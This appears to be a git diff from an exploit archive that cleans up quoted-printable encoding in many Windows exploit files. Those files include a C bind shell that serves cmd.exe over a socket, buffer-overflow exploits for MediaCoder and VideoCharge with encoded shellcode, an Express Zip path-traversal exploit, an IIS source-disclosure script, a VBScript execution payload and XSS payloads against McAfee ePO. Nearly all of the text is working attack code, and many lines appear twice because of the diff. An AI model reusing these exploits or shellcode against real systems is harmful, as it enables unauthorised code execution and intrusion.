if (WSAStartup(MAKEWORD(2,2), &HWSAdata) !=3D 0) { exit(1); }
if ((s=3DWSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))=3D=3DINVALID_SOC=
if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { exit(1); }
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOC=
KET){=20
exit(1); }
sa.sin_family =3D AF_INET;
sa.sin_port =3D (USHORT)htons(HAXORCITOS);
sa.sin_addr.s_addr =3D htonl(INADDR_ANY);
len=3Dsizeof(sa);
if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) =3D=3D SOCKET_ERROR ) {=
sa.sin_family = AF_INET;
sa.sin_port = (USHORT)htons(HAXORCITOS);
sa.sin_addr.s_addr = htonl(INADDR_ANY);
len=sizeof(sa);
if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {=
=20
return(-1); }
if ( listen(s, 1) =3D=3D SOCKET_ERROR ) { return(-1); }
s2 =3D accept(s,(struct sockaddr *)&sa,&len);
if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); }
s2 = accept(s,(struct sockaddr *)&sa,&len);
closesocket(s);
ZeroMemory( &si, sizeof(si) ); ZeroMemory( &pi, sizeof(pi) );
si.cb =3D sizeof(si);
si.wShowWindow =3D SW_HIDE;
si.dwFlags =3DSTARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.hStdInput =3D (void *) s2; // SOCKET
si.hStdOutput =3D (void *) s2;
si.hStdError =3D (void *) s2;
si.cb = sizeof(si);
si.wShowWindow = SW_HIDE;
si.dwFlags =STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.hStdInput = (void *) s2; // SOCKET
si.hStdOutput = (void *) s2;
si.hStdError = (void *) s2;
if (!CreateProcess( NULL ,"cmd.exe",NULL, NULL,TRUE, 0,NULL,NULL,&si,&pi)) =
{
doFormatMessage(GetLastError());
@ -190,10 +190,10 @@ return(1);
/**************************************************************/
void main(int argc, char* argv[])
{
HWND console_wnd =3D NULL;
HWND console_wnd = NULL;
if (argc >=3D 2) {
pid =3D atoi (argv[1]);
if (argc >= 2) {
pid = atoi (argv[1]);
strncpy(buf,argv[0],sizeof(buf)-1);
EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&console_wnd));
} else {

4
platforms/windows/local/36822.pl
View file

@ -48,7 +48,7 @@ my $junk = "A" x 21;
# Egghunter code; NtAccessCheckAndAuditAlarm method; searches for "0t0t"
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=3DEAX
# msfencode -e x86/unicode_upper BufferRegister=EAX
# converted to ASCII
my $egghunter =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
@ -97,7 +97,7 @@ $allign2 = $allign2."\xc3"; # RETN
# msfpayload windows/messagebox
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=3DEAX
# msfencode -e x86/unicode_upper BufferRegister=EAX
# converted to ASCII
my $shellcode =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .

37
platforms/windows/local/36920.py
View file

@ -2,28 +2,25 @@
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
# Date: 05/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at ]yahoo [dot] com=20
# email: kwiha2003 [at ]yahoo [dot] com
# Version: 0.8.34.5716
# Tested on: Win XP3
# Vendor: http://www.mediacoderhq.com/
# Software link: http://www.mediacoderhq.com/getfile.htm?site=3Dmediacoder.=
info&file=3DMediaCoder-0.8.34.5716.exe
# Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe
# Greetz: b33f,corelan,offsec,vulnhub,HUST510
# Notes: Due to insifficient space after taking control of the EIP, you hav=
e to jump backwards and also=20
# Notes: Due to insifficient space after taking control of the EIP, you have to jump backwards and also
# avoid a few bad bytes after the "A"s.
#!/usr/bin/python
buffersize =3D 853
buffer =3D ("http://" + "\x41" * 256)
buffersize = 853
buffer = ("http://" + "\x41" * 256)
#Space for shellcode to decode
buffer +=3D "\x90" * 24
# msfpayload windows/exec CMD=3Dcalc R|msfencode -b "\x00\x0a\x0d\x20" -t c=
-e x86/shikata_ga_nai
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=3D1)
#unsigned char buf[] =3D=20
buffer +=3D("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
buffer += "\x90" * 24
# msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x20" -t c -e x86/shikata_ga_nai
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
#unsigned char buf[] =
buffer +=("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69"
"\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c"
"\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69"
@ -38,13 +35,13 @@ buffer +=3D("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf"
"\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb"
"\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae")
buffer +=3D "\x42" * 350
nseh =3D "\xEB\x06\x90\x90"
# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]=20
seh=3D"\xee\x04\x01\x66"
buffer += "\x42" * 350
nseh = "\xEB\x06\x90\x90"
# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]
seh="\xee\x04\x01\x66"
#Jump back 603 bytes due to insufficient space for shellcode
jmpbck =3D "\xe9\xA5\xfd\xff\xff"
junk =3D ("D" * 55)=20
f=3D open("exploit.m3u",'w')
jmpbck = "\xe9\xA5\xfd\xff\xff"
junk = ("D" * 55)
f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + jmpbck + junk)
f.close()

48
platforms/windows/local/36980.py
View file

@ -2,19 +2,17 @@
# Exploit Title: VideoCharge Vanilla BOF Exploit v3.16.3.04
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com=20
# email: kwiha2003 [at] yahoo [dot] com
# Version: v3.16.3.04
# Tested on: Win XP3
# Software link:http://www.softpedia.com/get/Multimedia/Video/Encoders-Conv=
erter-DIVX-Related/Videocharge-Express.shtml#download
# Software link:http://www.softpedia.com/get/Multimedia/Video/Encoders-Converter-DIVX-Related/Videocharge-Express.shtml#download
# Greetz: b33f,corelan,offsec,vulnhub,HUST510, packetstorm
#
# Notes: Copy the file created by the script into the videocharge folder
# Looks like the whole productline is messed. Same sploit for all ver=
sions
# Looks like the whole productline is messed. Same sploit for all versions
#
import struct
header =3D (
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
@ -33,7 +31,7 @@ header =3D (
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer =3D (
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
@ -280,15 +278,13 @@ footer =3D (
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize =3D 1000
payload =3D "\x41" * 230
# JMP ESP [urlmon.dll]
payload +=3D struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=3Dcalc R |msfencode BufferRegister=3DESP -e x=
86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=3D1)
buffersize = 1000
payload = "\x41" * 230
# JMP ESP [urlmon.dll]payload += struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload +=3D (
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
@ -322,16 +318,16 @@ payload +=3D (
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload +=3D "\x41" * (buffersize - len(payload))=20
sploit =3D header + payload + footer
=20
payload += "\x41" * (buffersize - len(payload))
sploit = header + payload + footer
print "[*] Creating .vcc file"
=20
try:
=09print "[+]Creating Exploit File...\n"
=09file =3D open("noname1.vcc","wb")=20
=09file.write(sploit)
=09file.close
=09print "[+]File noname1.vcc create successfully.\n"
except:=09
=09print "**[-]Error: #{$!}\n"
print "[+]Creating Exploit File...\n"
file = open("noname1.vcc","wb")
file.write(sploit)
file.close
print "[+]File noname1.vcc create successfully.\n"
except:
print "**[-]Error: #{$!}\n"

54
platforms/windows/local/36981.py
View file

@ -2,24 +2,20 @@
# Exploit Title: VideoCharge Vanilla BOF Exploit v3.18.4.04
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com=20
# email: kwiha2003 [at] yahoo [dot] com
# Version: v3.18.4.04
# Tested on: Win XP3
# Software link:http://www.softpedia.com/get/Multimedia/Video/Encoders-Conv=
erter-DIVX-Related/Videocharge-Full.shtml
# Software link:http://www.softpedia.com/get/Multimedia/Video/Encoders-Converter-DIVX-Related/Videocharge-Full.shtml
# Greetz: b33f,corelan,offsec,vulnhub,HUST510, packetstorm
#
# Notes: Copy the file created by the script into the videocharge folder
# All third party modules are SAFESEH'ed
# A bigger buffer of > 1000 & <3000 A's will also crash the program =
but you'd have to
# use the SEH route which will make for a good exercise since the pr=
ogram only
# ascii printable x-ters and 5c (retn) is a bad x-ter (no push[reg]+=
ret, jmp[reg] or call[reg] )
# A bigger buffer of > 1000 & <3000 A's will also crash the program but you'd have to
# use the SEH route which will make for a good exercise since the program only
# ascii printable x-ters and 5c (retn) is a bad x-ter (no push[reg]+ret, jmp[reg] or call[reg] )
#
import struct
header =3D (
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
@ -38,7 +34,7 @@ header =3D (
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer =3D (
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
@ -285,15 +281,13 @@ footer =3D (
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize =3D 1000
payload =3D "\x41" * 230
# JMP ESP [urlmon.dll]
payload +=3D struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=3Dcalc R |msfencode BufferRegister=3DESP -e x=
86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=3D1)
buffersize = 1000
payload = "\x41" * 230
# JMP ESP [urlmon.dll]payload += struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload +=3D (
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
@ -327,16 +321,16 @@ payload +=3D (
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload +=3D "\x41" * (buffersize - len(payload))=20
sploit =3D header + payload + footer
=20
payload += "\x41" * (buffersize - len(payload))
sploit = header + payload + footer
print "[*] Creating .vcc file"
=20
try:
=09print "[+]Creating Exploit File...\n"
=09file =3D open("noname1.vcc","wb")=20
=09file.write(sploit)
=09file.close
=09print "[+]File noname1.vcc create successfully.\n"
except:=09
=09print "**[-]Error: #{$!}\n"
print "[+]Creating Exploit File...\n"
file = open("noname1.vcc","wb")
file.write(sploit)
file.close
print "[+]File noname1.vcc create successfully.\n"
except:
print "**[-]Error: #{$!}\n"

40
platforms/windows/local/36982.py
View file

@ -2,7 +2,7 @@
# Exploit Title: VideoCharge v3.16.4.06
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com=20
# email: kwiha2003 [at] yahoo [dot] com
# Version: 3.16.4.06
# Tested on: Win XP3
# Software link: http://www.softpedia.com/dyn-postdownload.php/36f0ea5a24f3=
@ -19,7 +19,7 @@ ogram only
ret, jmp[reg] or call[reg] )
#
import struct
header =3D (
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
@ -38,7 +38,7 @@ header =3D (
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer =3D (
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
@ -285,15 +285,15 @@ footer =3D (
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize =3D 1000
payload =3D "\x41" * 230
buffersize = 1000
payload = "\x41" * 230
# JMP ESP [urlmon.dll]
payload +=3D struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=3Dcalc R |msfencode BufferRegister=3DESP -e x=
payload += struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x=
86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=3D1)
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload +=3D (
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
@ -327,16 +327,16 @@ payload +=3D (
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload +=3D "\x41" * (buffersize - len(payload))=20
sploit =3D header + payload + footer
=20
payload += "\x41" * (buffersize - len(payload))
sploit = header + payload + footer
print "[*] Creating .vcc file"
=20
try:
=09print "[+]Creating Exploit File...\n"
=09file =3D open("noname1.vcc","wb")=20
=09file.write(sploit)
=09file.close
=09print "[+]File noname1.vcc create successfully.\n"
except:=09
=09print "**[-]Error: #{$!}\n"
print "[+]Creating Exploit File...\n"
file = open("noname1.vcc","wb")
file.write(sploit)
file.close
print "[+]File noname1.vcc create successfully.\n"
except:
print "**[-]Error: #{$!}\n"

40
platforms/windows/local/39674.py Executable file
View file

@ -0,0 +1,40 @@
#!/usr/bin/python -w
# Title : Express Zip <= 2.40 Path Traversal
# Date : 07/04/2016
# Author : R-73eN
# Tested on : Windows Xp / Windows 7 Ultimate
# Software Link : http://www.nchsoftware.com/zip/
# Download Link: http://www.nchsoftware.com/zip/zipplus.exe
# Vulnerable Versions : Express Zip <= 2.40
# Express Zip doesn't validates " ..\ " which makes possible
# to do a path traversal attack which can be converted easily to RCE
# How to Reproduce:
# 1- Run Exploit
# 2- Right Click evil.zip go to Express Zip and click Extract Here
# 3- File will be extracted to the root of the partition in this case C:\POC.txt
# This quick and dirt code is written only for demonstration purposes.
# If you wanna profit from it you must modify it.
# Video: https://www.youtube.com/watch?v=kb43h8Hoo0o
#
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
import zipfile, sys
if(len(sys.argv) != 2):
print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
print "[+] Example: python exploit.py test.txt"
exit(0)
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile("evil.zip", "w")
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\POC.txt")
zf.close()
print "[+] Created evil.zip successfully [+]"

2
platforms/windows/remote/16700.rb
View file

@ -372,7 +372,7 @@ class Metasploit3 < Msf::Exploit::Remote
def create_email_body_html(body, subject)
body = body.gsub(/\\[nr]/, "<BR>\n")
body = body.gsub(/\\t/, "&nbsp;&nbsp;&nbsp;")
body = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=3D\"Content-Type\" CONTENT=3D\"text/html; charset=3Diso-8859-=\n1\">\n<TITLE>" << subject << "</TITLE>\n</HEAD>\n<BODY>\n" << body << "\n<BR><BR>\n</BODY>\n</HTML>"
body = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=iso-8859-=\n1\">\n<TITLE>" << subject << "</TITLE>\n</HEAD>\n<BODY>\n" << body << "\n<BR><BR>\n</BODY>\n</HTML>"
return body
end

12
platforms/windows/remote/20151.pl
View file

@ -23,23 +23,23 @@ http://www.victim.com/default.asp > file_to_save
~; exit;}
$victimurl=3D$ARGV[0];
$victimurl=$ARGV[0];
# Create a user agent object
use LWP::UserAgent;
$ua =3D new LWP::UserAgent;
$ua = new LWP::UserAgent;
# Create a request
my $req =3D new HTTP::Request GET =3D> $victimurl . '\\'; # Here =
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here =
is the backslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate =3D> 'f'); # Here is the famous translate =
$req->header(Translate => 'f'); # Here is the famous translate =
header :))
$req->content('match=3Dwww&errors=3D0');
$req->content('match=www&errors=0');
# Pass request to the user agent and get a response back
my $res =3D $ua->request($req);
my $res = $ua->request($req);
# Check the outcome of the response
if ($res->is_success) {

4
platforms/windows/remote/25784.txt
View file

@ -39,8 +39,8 @@ btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
btfbtf
-->
<title>YOU ARE VULNERABLE</title>
<script language=3Dvbscript>set btf=3Dcreateobject("wscript.shell")=
:btf.run("calc")</script><body style=3D"background-color:red;font-si=
<script language=vbscript>set btf=createobject("wscript.shell")=
:btf.run("calc")</script><body style="background-color:red;font-si=
ze:40px;"><b>YOU ARE VULNERABLE!!!</b><br><br><br>Regards,<br><br>
Benjamin Tobias Franz<br>Germany</body>
--btf--

2
platforms/windows/remote/25948.txt
View file

@ -24,7 +24,7 @@ Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<title>Test XSS of uploaded documents</title>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1">
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
</HEAD>
<BODY>

124
platforms/windows/webapps/24901.txt
View file

@ -230,28 +230,28 @@ Code Review:
<TH noWrap>Last Sold</TH>
<TH noWrap>Stock First Arrival</TH></TR>
<TR>
<TD vAlign=3Dtop>[PERSISTENT INJECTED SCRIPT CODE!]'=20
src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=3Dtop>[PERSISTENT INJECTED SCRIPT CODE!]'=20
src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=3Dtop>[PERSISTENT INJECTED SCRIPT CODE!]'=20
src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=3Dtop>[PERSISTENT INJECTED SCRIPT CODE!]'=20
src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=3Dtop>=A31.00</TD>
<TD vAlign=3Dtop>10</TD>
<TD vAlign=3Dtop>10</TD>
<TD vAlign=3Dtop>0</TD>
<TD vAlign=3Dtop>0</TD>
<TD vAlign=3Dtop>0</TD>
<TD vAlign=3Dtop>=A312.00</TD>
<TD vAlign=3Dtop> </TD>
<TD vAlign=3Dtop> </TD>
<TD vAlign=3Dtop> </TD>
<TD vAlign=3Dtop>12/24/2012</TD></TR>
<TD vAlign=top>[PERSISTENT INJECTED SCRIPT CODE!]'
src="res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=top>[PERSISTENT INJECTED SCRIPT CODE!]'
src="res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=top>[PERSISTENT INJECTED SCRIPT CODE!]'
src="res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=top>[PERSISTENT INJECTED SCRIPT CODE!]'
src="res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=top>=A31.00</TD>
<TD vAlign=top>10</TD>
<TD vAlign=top>10</TD>
<TD vAlign=top>0</TD>
<TD vAlign=top>0</TD>
<TD vAlign=top>0</TD>
<TD vAlign=top>=A312.00</TD>
<TD vAlign=top> </TD>
<TD vAlign=top> </TD>
<TD vAlign=top> </TD>
<TD vAlign=top>12/24/2012</TD></TR>
<TR>
<TD vAlign=3Dtop>BBA123G</TD>
<TD vAlign=3Dtop>Angled Building Block</TD>
<TD vAlign=top>BBA123G</TD>
<TD vAlign=top>Angled Building Block</TD>
@ -264,76 +264,76 @@ Code Review:
<TBODY>
<TR>
<TD vAlign=3Dtop width=3D"32%">
<TD vAlign=top width="32%">
<P><STRONG>Fault Description</STRONG></P>
<P>Created: 12/25/2012</P></TD>
<TD vAlign=3Dtop width=3D"68%">
<TD vAlign=top width="68%">
=
[PERSISTENT INJECTED SCRIPT CODE!]</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD> </TD></TR>
<TR>
<TD>
<TABLE=20
style=3D"BORDER-BOTTOM: #000000 1px solid; =
<TABLE
style="BORDER-BOTTOM: #000000 1px solid; =
BORDER-LEFT: #000000 1px solid; BORDER-TOP: #000000 1px solid; =
BORDER-RIGHT: #000000 1px solid"=20
border=3D0 cellSpacing=3D10 cellPadding=3D8 =
width=3D"100%">
BORDER-RIGHT: #000000 1px solid"
border=0 cellSpacing=10 cellPadding=8 =
width="100%">
<TBODY>
<TR>
<TD vAlign=3Dtop width=3D"32%">
<TD vAlign=top width="32%">
<P><STRONG>Resolution</STRONG></P>
<P>Resolved: </P></TD>
<TD vAlign=3Dtop width=3D"68%">
<TD vAlign=top width="68%">
=
[PERSISTENT INJECTED SCRIPT CODE!]</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD> </TD></TR>
<TR>
<TD>
<TABLE=20
style=3D"BORDER-BOTTOM: #000000 1px solid; =
<TABLE
style="BORDER-BOTTOM: #000000 1px solid; =
BORDER-LEFT: #000000 1px solid; BORDER-TOP: #000000 1px solid; =
BORDER-RIGHT: #000000 1px solid"=20
border=3D0 cellSpacing=3D10 cellPadding=3D8 =
width=3D"100%">
BORDER-RIGHT: #000000 1px solid"
border=0 cellSpacing=10 cellPadding=8 =
width="100%">
<TBODY>
<TR>
<TD vAlign=3Dtop width=3D"32%"><STRONG>Fault =
Report Notes=20
<TD vAlign=top width="32%"><STRONG>Fault =
Report Notes
</STRONG></TD>
<TD vAlign=3Dtop width=3D"68%">
<TD vAlign=top width="68%">
[PERSISTENT INJECTED SCRIPT CODE!]</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD> </TD></TR>
<TR>
<TD>
<TABLE=20
style=3D"BORDER-BOTTOM: #000000 1px solid; =
<TABLE
style="BORDER-BOTTOM: #000000 1px solid; =
BORDER-LEFT: #000000 1px solid; BORDER-TOP: #000000 1px solid; =
BORDER-RIGHT: #000000 1px solid"=20
border=3D0 cellSpacing=3D10 cellPadding=3D8 =
width=3D"100%">
BORDER-RIGHT: #000000 1px solid"
border=0 cellSpacing=10 cellPadding=8 =
width="100%">
<TBODY>
<TR>
<TD vAlign=3Dtop width=3D"32%"><STRONG>Order Notes =
<TD vAlign=top width="32%"><STRONG>Order Notes =
</STRONG></TD>
<TD vAlign=3Dtop width=3D"68%">
<TD vAlign=top width="68%">
[PERSISTENT INJECTED SCRIPT CODE!]</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD> </TD></TR>
<TR>
<TD> </TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD><IMG=20
<TD><IMG
=
src=3D"file:///C:/Documents%20and%20Settings/storm/Local%20Settings/Temp/=
vlabs_1x1.jpg"=20
width=3D1 height=3D150></TD>
<TD=20
vAlign=3Dtop> </TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></=
src="file:///C:/Documents%20and%20Settings/storm/Local%20Settings/Temp/=
vlabs_1x1.jpg"
width=1 height=150></TD>
<TD
vAlign=top> </TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></=
BODY></HTML>
...
@ -353,25 +353,25 @@ Content-Type: multipart/related;
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.6157
class=3Dstyle20><BR></SPAN></STRONG></DIV></TD>
<TD vAlign=3Dtop width=3D"50%">
<DIV align=3Dright>
<P><IMG=20
class=style20><BR></SPAN></STRONG></DIV></TD>
<TD vAlign=top width="50%">
<DIV align=right>
<P><IMG
=
src=3D""=20
width=3D323 height=3D99><BR><BR><STRONG>
src=""
width=323 height=99><BR><BR><STRONG>
[PERSISTENT INJECTED SCRIPT CODE!]</STRONG><BR>
[PERSISTENT INJECTED SCRIPT CODE!]
<P></P></DIV></TD></TR></TBODY></TABLE></DIV></TD></TR>
<TR>
<TD vAlign=3Dtop>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<TD vAlign=top>
<TABLE border=0 cellSpacing=0 cellPadding=0 width="100%">
<TBODY>
<TR>
<TD width=3D1><IMG=20
<TD width=1><IMG
=
src=3D""=20
width=3D1 height=3D450></TD>
src=""
width=1 height=450></TD>
Risk:

10
platforms/windows/webapps/26807.txt
View file

@ -45,7 +45,7 @@ McAfee Solution:
Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013.
Item "b" has been addressed per Security Bulletin SB10043.
(https://kc.mcafee.com/corporate/index?page=3Dcontent&id=3DSB10043)
(https://kc.mcafee.com/corporate/index?page=content&id=SB10043)
@ -58,10 +58,10 @@ b. POST /console/createDashboardContainer.do HTTP/1.1
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard
